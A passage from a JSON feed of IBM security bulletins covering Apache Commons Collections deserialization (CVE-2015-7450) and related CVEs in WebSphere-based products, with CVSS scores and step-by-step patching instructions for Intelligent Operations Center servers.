3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T15:13:10", "type": "ibm", "title": "Security Bulletin: Multiple security vulnerabilities has been identified in Websphere Application Server shipped with Jazz for Service Management (CVE-2015-7450) (CVE-2015-2017)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2017", "CVE-2015-7450"], "modified": "2018-06-17T15:13:10", "id": "305CFF54D1B74278AA889780BABE7E0790314E9D321B6262C0EA59170C7721E6", "href": "https://www.ibm.com/support/pages/node/271947", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:54:50", "description": "## Summary\n\nWebSphere Application Server is shipped as a component of IBM License Metric Tool 7.5 and IBM Tivoli Asset Discovery for Distributed 7.5. Information about a security vulnerability affecting WebSphere Application Server has been published in a security bulletin. \n\n## Vulnerability Details\n\nPlease consult the security bulletin [Security Bulletin: Vulnerability in Apache Commons affect IBM WebSphere Application Server (CVE-2015-4750)](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product and Version \n---|--- \nIBM License Metric Tool 7.5 \nIBM Tivoli Asset Discovery for Distributed 7.5| WebSphere Application Server 7 \n \n## Remediation/Fixes\n\nApply the fix described in the bulletin linked above.\n\n## Workarounds and Mitigations\n\nNone.\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response 
Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n08 March 2016: Corrected CVE number\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n[{\"Product\":{\"code\":\"SS8JFY\",\"label\":\"IBM License Metric Tool\"},\"Business Unit\":{\"code\":\"BU053\",\"label\":\"Cloud & Data Platform\"},\"Component\":\"--\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF010\",\"label\":\"HP-UX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF027\",\"label\":\"Solaris\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"7.5\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}},{\"Product\":{\"code\":\"SSHT5T\",\"label\":\"Tivoli Asset Discovery for Distributed\"},\"Business Unit\":{\"code\":\"BU058\",\"label\":\"IBM Infrastructure w\\/TPS\"},\"Component\":\" \",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF010\",\"label\":\"HP-UX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF027\",\"label\":\"Solaris\"}],\"Version\":\"7.5\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB26\",\"label\":\"Storage\"}}]", "cvss3": {}, "published": "2021-04-26T21:17:25", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in WebSphere Application Server shipped with IBM License Metric Tool 7.5 and IBM Tivoli Asset Discovery for Distributed 7.5 (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", 
"exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-4750", "CVE-2015-7450"], "modified": "2021-04-26T21:17:25", "id": "689070AB4C011A979BBA5848242A400944D849D04225B611EB1D2B6DEFE03427", "href": "https://www.ibm.com/support/pages/node/271959", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-02-21T01:44:41", "description": "## Summary\n\nApache Commons Collections and Apache Groovy vulnerabilities for handling Java object deserialization were addressed by IBM UrbanCode Build\n\n## Vulnerability Details\n\n**CVE-ID:** [CVE-2015-7450](<https://vulners.com/cve/CVE-2015-7450>) \n**Description:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \n**CVSS Base Score: **9.8 \n**CVSS Temporal Score**: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/107918> for the current score \n**CVSS Environmental Score*:** Undefined \n**CVSS Vector: **(CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n**CVE-ID:** [CVE-2015-3253](<https://vulners.com/cve/CVE-2015-3253>) \n**Description:** Apache Groovy could allow a remote attacker to execute arbitrary code on the system, caused by the failure to isolate serialization code when using standard Java serialization mechanim to communicate between servers. 
An attacker could exploit this vulnerability to deserialize objects and execute arbitrary code on the system or cause a denial of service. \n**CVSS Base Score: **7.3 \n**CVSS Temporal Score**: See [](<http://xforce.iss.net/xforce/xfdb/103792>)<https://exchange.xforce.ibmcloud.com/vulnerabilities/104819> for the current score \n**CVSS Environmental Score*:** Undefined \n**CVSS Vector: **(CVSS:3.0/AV:N/AC:L/PR:N/UI:N/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nIBM UrbanCode Build 6.1.0, 6.1.0.1, 6.1.0.2, and 6.1.1 on all supported platforms.\n\n## Remediation/Fixes\n\nUpgrade to IBM UrbanCode Build 6.1.1.1.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T22:32:15", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Apache Commons Collections and Apache Groovy affects IBM UrbanCode Build (CVE-2015-7450, CVE-2015-3253)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3253", "CVE-2015-7450"], "modified": "2018-06-17T22:32:15", "id": "865491A8AE45D8889B4A4B68C631AF51173BD6FAC1388EA03C0A94F22F2C9462", "href": "https://www.ibm.com/support/pages/node/272069", "cvss": 
{"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:47:08", "description": "## Summary\n\nEmbedded version of Websphere Application Server is shipped as a component of Tivoli Integrated Portal. Information about the security vulnerabilities affecting Embedded version of Websphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nPlease consult the below security bulletins \n \n[Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) \n \n[Security Bulletin: HTTP response splitting attack in WebSphere Application Server (CVE-2015-2017)](<http://www-01.ibm.com/support/docview.wss?uid=swg21966837>) \n \nfor vulnerability details and information about fixes\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product and Version \n---|--- \nTivoli Integrated Portal version 2.1 \nTivoli Integrated Portal version 2.2 \nTivoli Integrated Portal version 1.1.1.x \n(wherever applicable)| embedded Websphere Application Server version 7.0 \nembedded Websphere Application Server version 7.0 \nembedded Websphere Application Server version 6.1 \n(wherever applicable) \n \n## Remediation/Fixes\n\nNone\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T15:13:10", "type": "ibm", "title": "Security Bulletin: Multiple security vulnerabilities has been identified in Websphere Application Server shipped with Tivoli 
Integrated Portal (CVE-2015-7450) (CVE-2015-2017)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2017", "CVE-2015-7450"], "modified": "2018-06-17T15:13:10", "id": "D6EF0A354BC60FD9763CCD91736DAA8B1445C437C0A7B30389216581A9447D9D", "href": "https://www.ibm.com/support/pages/node/271931", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T05:38:25", "description": "## Summary\n\nIBM InfoSphere Information Server could allow a malicious user who can login in IIS using their own user id to change the user cookie to another user id to possibly gain access to information that the other user id had access to.\n\n## Vulnerability Details\n\nCVEID: [CVE-2015-7490](<https://vulners.com/cve/CVE-2015-7450>) \nDESCRIPTION: IBM InfoSphere Information Server could allow a malicious user who can login in IIS using their own user id to change the user cookie to another user id to possibly gain access to information that the other user id had access to. 
\nCVSS Base Score: 3.1 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/108786> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N)\n\n## Affected Products and Versions\n\nThe following product, running on all supported platforms, is affected: \nIBM InfoSphere Information Server: versions 8.5, 8.7, 9.1, 11.3, and 11.5\n\n## Remediation/Fixes\n\n**_Product_**\n\n| **_VRMF_** | **_APAR_** | **_Remediation/First Fix_** \n---|---|---|--- \nInfoSphere Information Server | 11.5 | JR54787 | \\--Apply IBM InfoSphere Information Server version _[11.5.0.1](<https://www.ibm.com/support/pages/node/586419>)_ \nInfoSphere Information Server | 11.3 | JR54787 | \\--Apply IBM InfoSphere Information Server version [_11.3.1.2 _](<http://www-01.ibm.com/support/docview.wss?uid=swg24040138>) \n\\--Apply IBM InfoSphere Information Server Framework [_Security Patch_](<http://www.ibm.com/support/docview.wss?uid=swg24041837>) \nInfoSphere Information Server | 9.1 | JR54787 | \\--Apply IBM InfoSphere Information Server version [_9.1.2.0_](<http://www-01.ibm.com/support/docview.wss?uid=swg24035470>) \n\\--Apply IBM InfoSphere Information Server Framework [_Security Patch_](<http://www.ibm.com/support/docview.wss?uid=swg24041825>) \nInfoSphere Information Server | 8.7 | JR54787 | \\--Apply IBM InfoSphere Information Server version [_8.7 Fix Pack 2_](<http://www-01.ibm.com/support/docview.wss?uid=swg24034359>) \n\\--Apply IBM InfoSphere Information Server Framework [_Security Patch_](<http://www.ibm.com/support/docview.wss?uid=swg24041838>) \nInfoSphere Information Server | 8.5 | JR54787 | \\--Apply IBM InfoSphere Information Server version [_8.5 Fix Pack 3_](<http://www-01.ibm.com/support/docview.wss?uid=swg24033513>) \n\\--Apply IBM InfoSphere Information Server Framework [_Security Patch_](<http://www.ibm.com/support/docview.wss?uid=swg24041826>) \n \n \nNote: The same fix may be listed 
under multiple vulnerabilities. Installing the fix addresses all vulnerabilities to which the fix applies. Also, some fixes require installing both a fix pack and a subsequent patch. While the fix pack must be installed first, any additional patches required may be installed in any order.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-21T18:22:30", "type": "ibm", "title": "Security Bulletin: Insecure Transmission Vulnerability with IBM InfoSphere Information Server (CVE-2015-7490)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450", "CVE-2015-7490"], "modified": "2020-10-21T18:22:30", "id": "7046138B9599A1C4F494C484A9BB676F47CE5DB50FD7EC9400CB6F191317A8B0", "href": "https://www.ibm.com/support/pages/node/540587", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-28T17:48:28", "description": "## Summary\n\nRemote execution vulnerability in Apache Commons Collections affects Intelligent Operations Center components WebSphere Application Server (WAS) or WAS Hypervisor Edition.\n\n## Vulnerability Details\n\n**CVE ID**:** 
**[](<https://vulners.com/cve/CVE-2014-3566>)[CVE-2015-7450](<https://vulners.com/cve/CVE-2015-7450>) \n \nDescription: Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \n\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nThis vulnerability affects editions of WebSphere Application Server and bundling products, and all versions and releases of IBM WebSphere Application Server in: \n\nVersions 1.5 and 1.6, all sub-versions, of\n\n * IBM Intelligent Operations Center\n * IBM Intelligent Operations for Water\n * IBM Intelligent Operations for Transportation\n * IBM Intelligent City Planning and Operations\n \nVersions 5.1 and all sub-versions of \nIBM Intelligent Operations Center \n\n## Remediation/Fixes\n\nIf you have version 5.1 or later, see **_For Intelligent Operations Center 5.1.x_** below. \n \n**_For Intelligent Operations Center (IOC), Intelligent Transportation, and Intelligent Water Versions 1.6 Standard or High Availability:_** \nFor High Availability, the same steps apply. Stop both Analytics servers and both Applications servers and perform the upgrade by using IBM Installation Manager on the second Analytics server and the second Applications server after you perform the upgrade on the primary Analytics server and the primary Applications server. \n \nYou must update WebSphere Application Server on all Analytics servers and all Applications servers. 
\n \n**Installation prerequisites for Analytics and Applications servers.** \n \n1) You must have a Passport Advantage ID and password. \n \n2) Log in as root on each server. \n \n3) All servers should have access to the internet for the following instructions. \n\nIf the servers do not have access to the internet, you can download the fix or interim fix from the internet on another system and transfer the fix or interim fix to the file system on each server that must be updated. Follow the instructions in the link below and in the refer-to section. \n \nDownload the files that contain the fixes from Fix Central, and use local updating. For the following steps that use IBM Installation Manager to install the WebSphere update, use the URL: \n[`**_https://www.ibm.com/support/knowledgecenter/SSAW57_8.5.5/com.ibm.websphere.installation.nd.doc/ae/tins_install_fixes_dist_gui.html?cp=SSAW57_8.5.5%2F1-5-0-5-0-5-0&lang=en_**`](<https://www-01.ibm.com/support/knowledgecenter/SSAW57_8.5.5/com.ibm.websphere.installation.nd.doc/ae/tins_install_fixes_dist_gui.html?cp=SSAW57_8.5.5%2F1-5-0-5-0-5-0&lang=en>) \n \nThe fix that you must download for WebSphere is located here: \n[`_http://www-01.ibm.com/support/docview.wss?uid=swg21970575_`](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) \n4) **Either perform the update using a graphical user interface (GUI):**\n\nLog in to a GUI desktop on Linux. \nThe desktop can be either Gnome or KDE. \nIf a desktop is not installed, you can use these steps to install a desktop: a) Enter the command: `**yum -y groupinstall \"X Window System\" Desktop**` b) Modify the file `**/etc/inittab**` to contain the line: `**id:5:initdefault:**` c) Reboot the operating system. 
** Or**** perform the update by using a command prompt:**\n\nIf you have not installed a desktop, and you do not wish to install a desktop for the IBM Installation Manager, you can install interim fixes from a command prompt by following the syntax and commands described here: <https://www.ibm.com/support/knowledgecenter/SSEQTP_8.0.0/com.ibm.websphere.installation.base.doc/info/aes/ae/tins_install_fixes_dist_cl.html?lang=en> Follow the advice in this link wherever the IBM Installation Manager is mentioned in the rest of these procedures. \n5) Either use `IOCControl` with the IOC Topology password to stop WebSphere on the Analytics servers and on the Applications servers, or stop WebSphere by using another method such as the IBM Integrated Console. \n \n \n**Upgrading WebSphere Application Server on the Analytics servers** \n \n \nTo perform the upgrade, follow these steps: \n \n1) Log on to each Analytics server through a terminal server: \n\nLog on as user `**ibmadmin**` if possible. \nIf `**ibmadmin**` is unavailable, \nlog on as user `**root**` and enter the command: `**perform \"su - ibmadmin\".**` \n2) Enter the command: `**IOCControl -a stop -c ana -p \"ioc topology password\"**` When the **IOCControl** command finishes, you should see output such as this: \n\n`**IBM COGNOS Enterprise node agent (anacognosnode) - [ off ] \nIBM COGNOS Enterprise dispatcher (anacognosdisp) - [ off ] \nIBM COGNOS Enterprise gateway (anacognosgw) - [ off ] \nIBM ILOG CPLEX Optimization Studio node agent (anacplexnode) - [ off ] \nIBM ILOG CPLEX Optimization Studio server (anacplexserv) - [ off ]**` \n`**IBM SPSS Modeler server (anaspss) - [ on ]**` \n3) Log on to the Analytics server as user `**root**` by using the Gnome desktop or the KDE desktop. \n \n4) Configure the Installation Manager: \n\na) Start the Installation Manager through the GUI : **Applications -> IBM Applications Installation Manager** b) In **File -> Preferences .... 
Passport Advantage**, select **\"Connect to Passport Advantage\"** Click **Apply** and then click **OK.** \nc) In **File -> Preferences .... Repository**, clear the selection for every repository that begins with the string `**\"/tmp/ioc\" or \"/installMedia/*\"**`. These repositories are no longer relevant, and can be deleted. d) Select `**\"Search service repositories during installation and updates\"**`. Click **Apply** and then click **OK.** e) In `**File -> Preferences --> Updates**`, select `**\"Search for Installation Manager updates ..\"**`. Click **Apply** and then click **OK.** The Installation Manager then looks for updates for the IBM Installation Manager Program itself. \nf) Stop and restart the IBM Installation Manager. \n5) Update the components on the Analytics server: \n\na) Start the Installation Manager through the GUI: **Applications -> IBM Applications Installation Manager** b) Select` ``**'Update'**`. \nc) Select `**'Next'**` repeatedly until you are prompted for an IBM ID and password. On the next screen, where you are prompted for a Master Password, click `**'Cancel'**`. d) If you are prompted to perform an update to a new version of Installation Manager, click `**'Yes'**` to perform the upgrade, and then click `**'OK'**` to restart the Installation Manager when prompted. e) If you upgraded the Installation Manager, select `**\"Update\"**` again. \ng) If you are prompted to attach to the IBM WebSphere Application Server Repository, select `**'Yes'**`. h) Enter your IBM ID and password. \ni) On the \"Update Packages\" screen, in the Package Group Name column, select \"IBM WebSphere Application Server Network Deployment V8.0\", and click `**'Next'**`. \n**_Do not select \"IBM SPSS Collaboration and Deployment Services 7.0\", and do not select \"Update all packages with recommended updates and recommended fixes\". 
IOC is incompatible with the upgrade to SPSS._** j) Select all available fixes for \"WebSphere Application Server Network Deployment\". You must apply the Apache Commons fix **8.0.0.0-WS-WAS-IFPI52103**. \n**Note: This fix might not appear initially. You might have to apply earlier fixes to WebSphere Application Server before you can see this fix.** \nIf necessary, re-run IBM Installation Manager, select `**\"Update Packages for IBM WebSphere Application Server Network Deployment V8.0\"**`, and then select `**\"All available fixes for WebSphere Application Server Network Deployment\"**`. \nApply all outstanding WebSphere Application Server updates. \n6) Log in at a terminal prompt as user `**ibmadmin**`. \n\n7) Start the Analytics server by entering the command: `**IOCControl -a start -c ana -p ibmioc16**` Wait for these lines to appear in the output: `**IBM COGNOS Enterprise node agent (anacognosnode) - [ on ]**` `** IBM COGNOS Enterprise dispatcher (anacognosdisp) - [ on ] \nIBM COGNOS Enterprise gateway (anacognosgw) - [ on ] \nIBM ILOG CPLEX Optimization Studio node agent (anacplexnode) - [ on ] \nIBM ILOG CPLEX Optimization Studio server (anacplexserv) - [ on ]**` \n`** IBM SPSS Modeler server (anaspss) - [ on ]**` \n8) To verify that the fixpacks and ifixes are installed on WebSphere Application Server, perform the following steps: \na) Log on to a terminal session as user `**root**`. \nb) Enter the commands: `**cd /opt/IBM/WebSphere/AppServer/bin **` \n`**./versionInfo.sh -fixpacks **` \n`**./versionInfo.sh -ifixdetail **` For more information on the `**versionInfo.sh**` command, see:[_http://www.ibm.com/support/knowledgecenter/SSAW57_8.0.0/com.ibm.websphere.nd.doc/info/ae/ae/rins_versionInfo.html?lang=en_](<http://www-01.ibm.com/support/knowledgecenter/SSAW57_8.0.0/com.ibm.websphere.nd.doc/info/ae/ae/rins_versionInfo.html?lang=en>) \nThe upgrade to WebSphere Application Server on the Analytics server is now complete. 
\n \n**Upgrading WebSphere Application Server on the Applications servers** \n \nTo perform the upgrade, follow these steps: \n \n1) Log on to the Analytics server through a terminal server. \n\nLog on as user `**ibmadmin**` if possible. \nIf `**ibmadmin**` is unavailable, \nlog on as user `**root**` and enter the command: `**perform \"su - ibmadmin\".**` \n2) Enter the command: `**IOCControl -a stop -c app -p \"topology password\"**` \nWhen the **IOCControl** command finishes, you should see output such as this: `** IBM WebSphere Application Server Network Deployment (appdmgr) - [ off ] \nIBM Business Monitor node agent (appbmonnode) - [ off ] \nIBM Business Monitor server (appbmonserv) - [ off ] \nIBM Lotus Sametime Proxy node agent (appstproxynode) - [ off ] \nIBM Lotus Sametime Proxy server (appstproxyserv) - [ off ] \nIBM Worklight node agent (appwrkltnode) - [ off ] \nIBM Worklight server (appwrkltserv) - [ off ] \nIBM WebSphere Portal Enable node agent (appwpenode) - [ off ] \nIBM WebSphere Portal Enable server (appwpeserv) - [ off ] \nIOP SVC tool node agent (appiopnode) - [ off ] \nIOP SVC tool server (appiopserv) - [ off ] \nIBM HTTP Server administration server - web server (webihsadm) - [ off ]**` \n`** IBM HTTP Server web server - web server (webihsserv) - [ off ]**` \n \n3) Log on to the Applications server as `**root**` by using the Gnome desktop or the KDE desktop. \n \n4) Configure the Installation Manager: \n\na) Start the Installation Manager through the GUI: **Applications -> IBM Applications Installation Manager** b) In **File -> Preferences .... Passport Advantage**, select **\"Connect to Passport Advantage\".** Click **Apply** and then click **OK.** \nc) In **File -> Preferences .... Repository**, clear the selection for every repository that begins with the string `**\"/tmp/ioc\"**` or `**\"/installMedia/*\"**`. These repositories are no longer relevant, and can be deleted. 
d) Select `**\"Search service repositories during installation and updates\"**`. Click **Apply** and then click **OK.** e) In `**File -> Preferences --> Updates**`, select `**\"Search for Installation Manager updates ..\"**`. Click **Apply** and then click **OK.** The Installation Manager then looks for updates for the IBM Installation Manager Program itself. \nf) Stop and restart the IBM Installation Manager. \n5) Update the components on the Applications server: a) Start the Installation Manager through the GUI: `**Applications -> IBM Applications Installation Manager**` b) Select `**'Update'**`. \nc) Select `**'Next'**` repeatedly until you are prompted for an IBM ID and password. On the next screen, that prompts for a Master Password, click `**'Cancel'**`. d) If you are prompted to perform an update to a new version of Installation Manager, click `**'Yes'**` to perform the upgrade, and then click `**'OK'**` to restart the Installation Manager when prompted. e) If you upgraded the Installation Manager, select `**\"Update\"**` again. \nf) If you are prompted to attach to the IBM WebSphere Application Server Repository, select `**'Yes'**`. g) Enter your IBM ID and password. \nh) On the \"Update Packages\" screen, in the Package Group Name column, select \"IBM WebSphere Application Server Network Deployment V8.0\" and click `**'Next'**`. \n**_Do not select \"IBM SPSS Collaboration and Deployment Services 7.0\", and do not select \"Update all packages with recommended updates and recommended fixes\". IOC is incompatible with the upgrade to SPSS._** i) Select all available fixes for \"WebSphere Application Server Network Deployment\". You must apply the Apache Commons fix `**8.0.0.0-WS-WAS-IFPI52103**`. \n**Note: This fix might not appear initially. 
You might have to apply earlier fixes to WebSphere Application Server before you can see this fix.** \nIf necessary, re-run IBM Installation Manager, select **\"Update Packages for IBM WebSphere Application Server Network Deployment V8.0\"** and then select **\"All available fixes for WebSphere Application Server Network Deployment\"**. Apply all outstanding WebSphere Application Server updates. \n6) Log on to a terminal prompt as user `ibmadmin`. \n \n7) Start the Applications server by entering the command: \n\n`IOCControl -a start -c app -p \"ioc topology password\"` \nWait for these lines to appear in the output: \n`IBM WebSphere Application Server Network Deployment (appdmgr) - [ on ]` \n`IBM Business Monitor node agent (appbmonnode) - [ on ]` \n`IBM Business Monitor server (appbmonserv) - [ on ]` \n`IBM Lotus Sametime Proxy node agent (appstproxynode) - [ on ]` \n`IBM Lotus Sametime Proxy server (appstproxyserv) - [ on ]` \n`IBM Worklight node agent (appwrkltnode) - [ on ]` \n`IBM Worklight server (appwrkltserv) - [ on ]` \n`IBM WebSphere Portal Enable node agent (appwpenode) - [ on ]` \n`IBM WebSphere Portal Enable server (appwpeserv) - [ on ]` \n`IOP SVC tool node agent (appiopnode) - [ on ]` \n`IOP SVC tool server (appiopserv) - [ on ]` \n`IBM HTTP Server administration server - web server (webihsadm) - [ on ]` \n`IBM HTTP Server web server - web server (webihsserv) - [ on ]` \n8) To verify that the fix packs and interim fixes are installed on WebSphere Application Server, perform the following steps: \na) Log on to a terminal session as user `root`. 
\nb) Enter the commands: \n`cd /opt/IBM/WebSphere/AppServer/bin` \n`./versionInfo.sh -fixpacks` \n`./versionInfo.sh -ifixdetail` \nFor more information on the `versionInfo.sh` command, see: [_http://www.ibm.com/support/knowledgecenter/SSAW57_8.0.0/com.ibm.websphere.nd.doc/info/ae/ae/rins_versionInfo.html?lang=en_](<http://www-01.ibm.com/support/knowledgecenter/SSAW57_8.0.0/com.ibm.websphere.nd.doc/info/ae/ae/rins_versionInfo.html?lang=en>) \nThe upgrade to WebSphere Application Server on the Applications server is now complete. \n \n**_For Intelligent Operations Center 5.1.x:_** \n \n**Installation prerequisites for Analytics and Applications servers** \n \n1) You must have a Passport Advantage ID and password. \n \n2) Log in as user `root` on each server. \n \n3) All servers should have access to the internet for the following instructions. If the servers do not have access to the internet, you can download the fix or interim fix from the internet on another system and transfer it to the file system on each server that must be updated. Follow the instructions in the link below and in the refer-to section. \n \nDownload the files that contain the fixes from Fix Central, and use local updating. 
For the following steps that use IBM Installation Manager to install the WebSphere update, use the URL: \n<https://www-01.ibm.com/support/knowledgecenter/SSAW57_8.5.5/com.ibm.websphere.installation.nd.doc/ae/tins_install_fixes_dist_gui.html?cp=SSAW57_8.5.5%2F1-5-0-5-0-5-0&lang=en> \n \nThe fix that you must download for WebSphere is located here: \n<http://www-01.ibm.com/support/docview.wss?uid=swg21970575> \n \n4) **Either perform the update using a graphical user interface (GUI):**\n\nLog in to a GUI desktop on Linux. \nThe desktop can be either Gnome or KDE. \nIf a desktop is not installed, you can use these steps to install a desktop: \na) Enter the command: `yum -y groupinstall \"X Window System\" Desktop` \nb) Modify the file `/etc/inittab` to contain the line: `id:5:initdefault:` \nc) Reboot the operating system. \n\n**Or perform the update by using a command prompt:**\n\nIf you have not installed a desktop, and you do not wish to install a desktop for the IBM Installation Manager, you can install interim fixes from a command prompt by following the syntax and commands described here: 